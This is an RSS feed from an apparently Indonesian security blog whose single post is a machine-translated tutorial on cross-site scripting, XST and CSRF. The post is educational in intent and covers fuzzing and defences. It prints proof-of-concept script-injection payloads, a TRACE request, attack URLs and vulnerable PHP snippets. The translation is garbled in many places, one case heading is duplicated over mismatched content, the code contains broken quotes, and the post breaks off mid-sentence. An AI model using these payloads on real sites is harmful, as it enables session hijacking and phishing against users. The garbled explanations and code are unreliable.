<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2enclosuresfull.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:media="http://search.yahoo.com/mrss/" xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" xmlns:creativeCommons="http://backend.userland.com/creativeCommonsRssModule" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0"><channel><title>Security Blog</title><link>http://sxcode.blogspot.com/</link><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/rss+xml" href="http://feeds.feedburner.com/SecurityBlog" /><description>is WRITER, VULNERABILITY RESEARCHER ,DIGITAL FORENSICS, INFORMATION SECURITY, APPLICATION SECURITY, PENETRATION TESTING, CODE  SCRIPTING, EXPLOITS, SECURITY NEWS, MALWARE, AND OTHER RANDOM GARBAGE.</description><language>en</language><managingEditor>noreply@blogger.com (Bajingan)</managingEditor><lastBuildDate>Wed, 27 Jul 2011 01:09:54 PDT</lastBuildDate><generator>Blogger http://www.blogger.com</generator><openSearch:totalResults xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/">6</openSearch:totalResults><openSearch:startIndex xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/">1</openSearch:startIndex><openSearch:itemsPerPage xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/">25</openSearch:itemsPerPage><feedburner:info uri="securityblog" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><media:copyright>by skygear</media:copyright><media:category scheme="http://www.itunes.com/dtds/podcast-1.0.dtd">Technology/Software How-To</media:category><media:category scheme="http://www.itunes.com/dtds/podcast-1.0.dtd">Technology/Tech News</media:category><itunes:owner><itunes:email>noreply@blogger.com</itunes:email></itunes:owner><itunes:explicit>no</itunes:explicit><itunes:subtitle>is WRITER, VULNERABILITY RESEARCHER ,DIGITAL FORENSICS, INFORMATION SECURITY, APPLICATION SECURITY, PENETRATION TESTING, CODE SCRIPTING, EXPLOITS, SECURITY NEWS, MALWARE, AND OTHER RANDOM GARBAGE.</itunes:subtitle><itunes:summary>is WRITER, VULNERABILITY RESEARCHER ,DIGITAL FORENSICS, INFORMATION SECURITY, APPLICATION SECURITY, PENETRATION TESTING, CODE SCRIPTING, EXPLOITS, SECURITY NEWS, MALWARE, AND OTHER RANDOM GARBAGE.</itunes:summary><itunes:category text="Technology"><itunes:category text="Software How-To" /></itunes:category><itunes:category text="Technology"><itunes:category text="Tech News" /></itunes:category><creativeCommons:license>http://creativecommons.org/licenses/by/2.0/</creativeCommons:license><feedburner:emailServiceId>SecurityBlog</feedburner:emailServiceId><feedburner:feedburnerHostname>http://feedburner.google.com</feedburner:feedburnerHostname><item><title>Tutorial XSS Injection</title><link>http://feedproxy.google.com/~r/SecurityBlog/~3/H1a1F0lx68A/tutorial-xss-injection.html</link><category>Tips - Triks</category><author>noreply@blogger.com (Bajingan)</author><pubDate>Wed, 27 Jul 2011 01:09:54 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-3900780076543133178.post-1829058035783846654</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;span class="Apple-style-span" style="color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21px;"&gt;:: Pendahuluan::&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21px;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Apa itu XSS dan apa yang mengacu kepada?&lt;br /&gt;
Alias XSS Cross Site Scripting adalah sisi klien serangan di mana seorang penyerang menciptakan link jahat,&lt;br /&gt;
script berisi kode yang kemudian dilaksanakan dalam browser korban. Kode script&lt;br /&gt;
bisa bahasa apapun yang didukung oleh browser, tetapi sebagian besar HTML dan Javascript yang digunakan bersama&lt;br /&gt;
dengan embedded Flash, Java atau ActiveX.&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Apa yang bisa Cross Site Scripting digunakan untuk?&lt;br /&gt;
Cross Site Scripting dapat digunakan untuk berbagai hal, seperti sesi-pembajakan, browser&lt;br /&gt;
serangan, phishing, propaganda dan bahkan cacing! Namun masih memerlukan korban untuk mengklik&lt;br /&gt;
link jahat diciptakan oleh penyerang.&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Bagaimana bisa Satu mendapatkan korban untuk mengklik link XSS?&lt;br /&gt;
Cara termudah untuk membuat orang meng-klik link berbahaya adalah untuk membuat mereka terlihat otentik dan non -&lt;br /&gt;
jahat. Memberi mereka alasan kemudian adalah rekayasa sosial-bagian yang harus mudah&lt;br /&gt;
kecuali jika korban sadar serangan tersebut dan / atau memiliki tindakan terhadap Cross Site Scripting, seperti NoScript.&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Bagaimana Satu menghindari XSS-links tampak mencurigakan?&lt;br /&gt;
Hal ini biasanya dilakukan dengan penyandian, layanan url pendek, mengarahkan dan bahkan flash!&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Yang tipe Cross Site Scripting yang ada?&lt;br /&gt;
Jenis yang paling umum adalah GET dan POST berbasis XSS. Namun Cross Site Scripting juga bisa&lt;br /&gt;
dipicu melalui cookie. Beberapa individu mengklaim bahwa XSS juga dapat dibagi menjadi gigih dan&lt;br /&gt;
non-persistent tetapi juga jenis-jenis dan harus disebut sebagai injeksi yang berbeda&lt;br /&gt;
kelas bug / kerentanan.&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Apa perbedaan antara GET-POST-XSS?&lt;br /&gt;
Perbedaannya adalah bahwa ketika GET-variabel yang digunakan adalah mungkin untuk melakukan serangan XSS normal&lt;br /&gt;
mana penyerang mengirimkan crafted URL jahat kepada korban yang kemudian dijalankan ketika&lt;br /&gt;
korban membuka link dalam browser.&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Dengan variabel POST-penyerang dapat f.ex. menggunakan flash untuk mengirim korban ke POST-XSS&lt;br /&gt;
situs rentan karena tidak mungkin untuk membuat URL ketika POST-variabel yang sedang digunakan.&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Apakah ada sub-kategori dari Cross Site Scripting?&lt;br /&gt;
Pada saat ada XSSR dan XSSQLI. Orang bisa mengatakan bahwa XSRF / CSRF milik yang sama&lt;br /&gt;
kategori, namun metode serangan terlalu banyak berbeda dari tradisional Cross Site Scripting.&lt;br /&gt;
CSSR alias XSSR atau Cross Site Redirection Script digunakan untuk mengarahkan korban kepada halaman lain&lt;br /&gt;
enggan. Halaman bisa misalnya berisi phishing template, kode serangan browser atau&lt;br /&gt;
beberapa kasus di mana data atau skema URI javascript digunakan: sesi-pembajakan. XSSQLI adalah&lt;br /&gt;
campuran Cross Site Scripting dan SQL Injection, di mana korban ketidaktahuan mengklik link berbahaya&lt;br /&gt;
SQL Injection berisi instruksi untuk suatu daerah di website yang membutuhkan hak istimewa yang&lt;br /&gt;
tamu atau anggota tidak memiliki. XSRF atau CSRF (kadang-kadang disebut sebagai C-Surf) berdiri untuk&lt;br /&gt;
Cross Site Request Pemalsuan yang digunakan untuk mengirim masukan dari pihak ke-3 situs ke situs target.&lt;br /&gt;
XSRF dapat dalam beberapa kasus dipicu hanya dengan melihat gambar yang dirancang khusus tetapi yang paling&lt;br /&gt;
sering digunakan adalah URL. Dengan Cross Site Request Pemalsuan itu mungkin untuk f.ex. mengubah&lt;br /&gt;
password korban jika situs target tidak diamankan dengan baik dengan bukti dll&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Apa itu XST dan dapat digunakan untuk apa saja?&lt;br /&gt;
XST juga dikenal sebagai Cross Site (Script) Tracing adalah suatu cara untuk menyalahgunakan HTTP Trace (Debug)&lt;br /&gt;
protokol. Apa pun yang seorang penyerang mengirimkan ke web-server yang telah diaktifkan akan mengirim TRACE&lt;br /&gt;
jawaban yang sama kembali. Jika penyerang mengirimkan berikut:&lt;br /&gt;
Code:&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;TRACE / HTTP/1.0&lt;br /&gt;
Host: target.tld&lt;br /&gt;
Custom-header: &amp;lt;script&amp;gt;alert(0)&amp;lt;/script&amp;gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Maka penyerang akan menerima sama “Custom-header: &amp;lt;scr …” kembali memungkinkan eksekusi script.&lt;br /&gt;
Namun setelah update browser terbaru tahun berikutnya (s) XST telah semakin sulit untuk&lt;br /&gt;
DNS dan berfungsi dengan benar.&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Bagaimana mungkin menemukan bug XSS dalam website?&lt;br /&gt;
Ada 2 metode: kode / script audit atau fuzzing yang digambarkan di bawah ini.&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Alat macam apa yang diperlukan untuk menemukan bug XSS? (REQ = Required, OPT = Optional)&lt;br /&gt;
- REQ: Internet Browser (seperti FireFox) dalam kasus Anda fuzzing.&lt;br /&gt;
- REQ:-penampil teks (seperti notepad) dalam kasus Anda audit.&lt;br /&gt;
- KPT: Sebuah proxy mencegat dalam kasus yang sedang Anda lakukan lebih maju XSS. (Dalam FireFox adalah mungkin untuk menggunakan Tamper Data).&lt;br /&gt;
- KPT: Browser Addons, untuk FireFox berikut ini adalah terutama bermanfaat: pembakar, JSView dan LiveHTTP Header.&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Apa lagi yang berguna untuk mengetahui apakah Kita ingin menemukan bug XSS?&lt;br /&gt;
- Browser keterbatasan mengenai Cross Site Scripting [1]&lt;br /&gt;
- HTTP Headers dan bagaimana protokol HTTP bekerja.&lt;br /&gt;
- HTML + Javascript dan mungkin tertanam serangan script. (flash dll)&lt;br /&gt;
- Mencegat proxy (Burp dll), alat diferensial (berbaur, ExamDiff, dll)&lt;br /&gt;
- Useful browser-addons (lihat FireCat [3])&lt;br /&gt;
- Website scanner (Nikto, W3AF, Grendel, Directory-fuzzers dll)&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Mana-bug XSS biasanya terletak?&lt;br /&gt;
Hal ini biasanya terletak di masukan pengguna yang diajukan baik melalui GET atau POST variabel, dimana hal itu tercermin pada&lt;br /&gt;
situs target sebagai teks di luar tag, tag di dalam nilai-nilai atau dalam javascript. Dapat juga dalam beberapa kasus&lt;br /&gt;
disampaikan melalui cookie, http header atau dalam kasus-kasus yang jarang upload.&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Bagaimana Satu melindungi sebuah situs terhadap XSS?&lt;br /&gt;
Cara terbaik adalah untuk memastikan bahwa semua pengguna input dan output divalidasi dengan benar. Namun dalam beberapa kasus&lt;br /&gt;
WAF yang IPS atau juga dapat melindungi terhadap XSS meskipun masih cara terbaik untuk memvalidasi input pengguna-dan-output dengan benar.&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;___ -:: Menemukan Bug – Dengan Fuzzing:: – ____________&lt;br /&gt;
[EASY] Contoh Kasus – A:&lt;br /&gt;
Kami berada di http://buggysite.tld di mana kita melihat “Cari-lapangan” di kanan atas. Karena kita tidak tahu&lt;br /&gt;
kode sumber nyata tapi hanya HTML-output dari situs kita harus fuzz apa-apa mana mungkin&lt;br /&gt;
untuk mengirimkan data. Dalam beberapa kasus, data akan tercermin di situs tersebut dan dalam beberapa kasus wont. Jika tidak&lt;br /&gt;
kita beralih ke kue berikutnya, header, mendapatkan / post variabel atau apa pun yang kita fuzzing.&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Yang paling efektif untuk bulu adalah untuk tidak menulis: &amp;lt;script&amp;gt; alert (0) &amp;lt;/ script&amp;gt; karena banyak situs yang berbeda&lt;br /&gt;
pencegahan terhadap Cross Site Scripting. Sebaliknya kita menciptakan string kustom yang dalam banyak kasus wont&lt;br /&gt;
memicu apa pun yang bisa mengubah output dari kesalahan menjadikan situs atau halaman yang tidak rentan.&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Contoh string yang efektif yaitu: “kata kunci ‘/ \&amp;gt; &amp;lt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;” ‘/ \&amp;gt; Dan &amp;lt;adalah yang paling umum digunakan html karakter yang digunakan dalam Cross Site Scripting. Namun, jika kita ingin&lt;br /&gt;
menjadi benar-benar teliti maka kita dapat juga menambahkan )(][}{% ke string yang kita gunakan untuk fuzz situs target.&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Alasan mengapa tidak ada dua "atau 'adalah karena hal ini dapat memicu WAF, IPS atau apa pun berjaga-jaga situs&lt;br /&gt;
mungkin telah mencoba untuk melaksanakan terhadap XSS bukan menggunakan skema pengkodean yang aman / rencana / siklus pengembangan.&lt;br /&gt;
Alasan mengapa semua karakter yang ditulis sebagai&amp;gt; &amp;lt;bukan &amp;lt;&amp;gt; adalah karena ini adalah bypass umum terhadap XSS-filter!&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Dengan pemikiran, kita menggunakan string berikut: "haxxor '/ \&amp;gt; &amp;lt;untuk fuzz medan pencarian:&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Mari kita melihat kembali HTML-code:&lt;br /&gt;
PHP Code:&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;input type="text" name="search" value="&amp;amp;quot;haxxor'/\&amp;amp;gt;&amp;amp;lt;" /&amp;gt; &amp;lt;br /&amp;gt; You searched for "haxxor\'/\\&amp;gt;&amp;lt; which returned no results.&lt;br /&gt;
...&lt;br /&gt;
Dalam kasus ini setelah tag string string disandikan dengan benar, namun di dalam string tag hanya punya beberapa&lt;br /&gt;
ditambahkan garis miring yang tidak apa-apa dalam kasus ini. Pada dasarnya kita dapat melewati ini dengan mudah dengan: "&amp;gt; &amp;lt;script&amp;gt; alert (0) &amp;lt;/ script&amp;gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Jika kita akan menampilkan eksternal javascript kita harus menghindari penggunaan "dan" tentu saja.&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Terakhir kita XSS-url dapat: http://yetanothersite.tld/search.php?query = "&amp;gt; &amp;lt;script&amp;gt; alert (0) &amp;lt;/ script&amp;gt; jika GET-variabel yang digunakan.&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;[Ringan] Contoh Kasus – C:&lt;br /&gt;
Kami berada di http://prettysecure.tld di mana kita menemukan kolom pencarian lain, sudah waktunya untuk mengirimkan string fuzzing kami.&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Berikut kode HTML-dikembalikan setelah string diajukan kami:&lt;br /&gt;
PHP Code:&lt;br /&gt;
…&lt;br /&gt;
&amp;lt;input type=”text” name=”search” value=”&amp;amp;quot;haxxor’/\&amp;amp;gt;&amp;amp;lt;”&amp;gt; You searched for “&amp;amp;quot;haxxor’/\&amp;amp;gt;&amp;amp;lt;” which returned no results.&lt;br /&gt;
… (further down)&lt;br /&gt;
&amp;lt;script&amp;gt;&lt;br /&gt;
…&lt;br /&gt;
s.prop1=”prettysecure”;&lt;br /&gt;
s.prop2=”\”haxxor%39/\%3E%3C”;&lt;br /&gt;
s.prop3=”adspace”;&lt;br /&gt;
…&lt;br /&gt;
&amp;lt;/script&amp;gt;&lt;br /&gt;
Dalam kasus ini setelah tag string string disandikan dengan benar, namun di dalam string tag hanya punya beberapa&lt;br /&gt;
ditambahkan garis miring yang tidak apa-apa dalam kasus ini. Pada dasarnya kita dapat melewati ini dengan mudah dengan: “&amp;gt; &amp;lt;script&amp;gt; alert (0) &amp;lt;/ script&amp;gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Jika kita akan menampilkan eksternal javascript kita harus menghindari penggunaan “dan” tentu saja.&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Terakhir kita XSS-url dapat: http://yetanothersite.tld/search.php?query = “&amp;gt; &amp;lt;script&amp;gt; alert (0) &amp;lt;/ script&amp;gt; jika GET-variabel yang digunakan.&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;[Ringan] Contoh Kasus – C:&lt;br /&gt;
Kami berada di http://prettysecure.tld di mana kita menemukan kolom pencarian lain, sudah waktunya untuk mengirimkan string fuzzing kami.&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Berikut kode HTML-dikembalikan setelah string diajukan kami:&lt;br /&gt;
PHP Code:&lt;br /&gt;
…&lt;br /&gt;
if($_GET['view_profile']==1) {&lt;br /&gt;
echo $_GET['name'];&lt;br /&gt;
… (more code)&lt;br /&gt;
}&lt;br /&gt;
…&lt;br /&gt;
Dengan melihat kode diatas kita dapat melihat bahwa jika view_profile adalah sama dengan 1 maka skrip akan mencetak “nama” variabel.&lt;br /&gt;
Contoh URL serangan bisa terlihat seperti: http://testz.tld/index.php?view_profile=1&amp;amp;name = &amp;lt;script&amp;gt; alert (0) &amp;lt;/ script&amp;gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;[KERAS] Contoh Kasus – B:&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;File berikut (search.php) memiliki beberapa kode yang menarik:&lt;br /&gt;
PHP Code:&lt;br /&gt;
…&lt;br /&gt;
if($_GET['set_flag']==1) {&lt;br /&gt;
$var = “checked”;&lt;br /&gt;
}&lt;br /&gt;
echo “&amp;lt;input type=’radio’ value=’flag’ checked=’” .htmlentities($var). “‘ /&amp;gt;”;&lt;br /&gt;
…&lt;br /&gt;
Ini adalah kerentanan bersyarat di mana dalam php.ini register_globals harus diatur ke Aktif. (Off factory default).&lt;br /&gt;
Register_globals pada dasarnya memungkinkan seorang individu untuk mengatur variabel dengan cepat, bahkan jika mereka tidak dimaksudkan untuk ditetapkan.&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Hal ini hanya berlaku untuk variabel yang TIDAK ditetapkan seperti dalam contoh di atas. Masalah lain yang kami temui&lt;br /&gt;
htmlentities Namun adalah karena kesalahan coding, kita masih bisa menyalahgunakan tag tanpa membuat yang baru.&lt;br /&gt;
Kita perlu menggunakan event handler dalam tag &amp;lt;input&amp;gt; dan beberapa CSS (Cascading Style Sheet) untuk memastikan bahwa&lt;br /&gt;
memicu korban tidak peduli apa eventhandler. Ada beberapa cara untuk melakukan itu, salah satunya adalah:&lt;br /&gt;
